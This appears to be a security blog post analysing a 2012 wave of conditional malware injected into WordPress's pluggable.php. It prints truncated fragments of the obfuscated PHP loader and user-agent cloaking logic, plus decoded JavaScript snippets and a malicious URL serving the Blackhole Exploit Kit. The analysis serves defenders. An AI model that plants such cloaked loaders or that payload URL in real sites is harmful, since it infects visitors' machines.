The last few days we have seen a large number of WordPress sites compromised with a hidden malware payload that lands inside wp-includes/pluggable.php. This is not a WordPress vulnerability, WordPress is simply being targeted as the host.
This malware is not new and we have been seeing variations of it since June, 2012. However, for the last few days the number of sites compromised have multiplied, prompting this post.
We are still tracking down how the sites are getting hacked, but so far we noticed a few similarities between them.
What’s Happening?
This is what gets added to pluggable.php typically at line 810-811:
$__name = “RANDOMMD5”;
if(1>0 AND !preg_match(“#(Firefox.3)|(opera)|(chrome)|..(wget)|(yahoo)|(yandex)#i”, $_SERVER[“HTTP_USER_AGENT”]) AND empty ($_COOKIE[$__name])) {
error_reporting(0);
$date = date(“D, j M Y 00:00:00″, time()+60*60*24*30);
$cookie = time().”.”.rand(1111111, 9999999);
echo “<script type=”text/javascript”>document.cookie = “”.$__name.”=”+escape(‘”.$cookie.”‘)+”; expires=”.$date.”; path=/”;”;
$__f = implode(“”, array_map(“chr”, explode(” “, “98 97 115 101 54 52 95 100 101 99 111 100 101”)));
echo $__f(“PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmluc..
If you are not familiar with PHP, this is conditional malware. The code checks the browser of the person visiting the site, and only displays if a few conditions are met: Browser (user agent) must not be Opera, Chrome, or Firefox 3, and traffic should not originate from a search engine (Google, Yahoo, etc).
Decode and Analyze
When you look at all the exclusions, it seems the malware is focusing on Windows users running Internet Explorer, or new versions of Firefox. After decoding the malware, we understand why. The following javaScript is executed in the browser:
<script type=”text/javascript”>document.cookie = “db6c..eed1f235454f7
=”+escape(‘123.456’)+”; expires=Fri, 14 Sep 2012 00:00:00; path=/”..
<script type=”text/javascript”>pal=0; pal-=5884; his=0.0034;his–;wax=7474;i
f(wax>0.0101){was=0.0106;cap=0.0359;if(cap<7740){hon=7;hon++}}kue=23;if..
This is fully random and changes per site. Often the payload starts as:
kos=26; kos+=8147;zag=2832;pic=17;pic++;ins=..
or
ama=0.001; if(ama>0){you=7336;you-=7397;chi=11;chi++}dun=0.035;dun–;pah=2404;pah–;
or
vac=0.0012;if(vac==0.0075){irk=null}foy=null;kop=9;kop+=17;bid=sea
Where’s it start
There are many other variations. Once decoded it attempts to load additional exploit code from:
http://qckdqxeu.co.tv/ckp2wnzxwiwrq41
From there it tries to exploit the user using the Blackhole Exploit Kit. Be advised that there are other domains in the .co.tv TLD doing the same thing, it is not limited to the one we’re pointing out. More to come on that!
This exploit kit focuses on Windows vulnerabilities, and it also shows a slight increase on the AVG Threat Labs page for the Phoenix Exploit Kit.
As always, we will post more details when we have it.
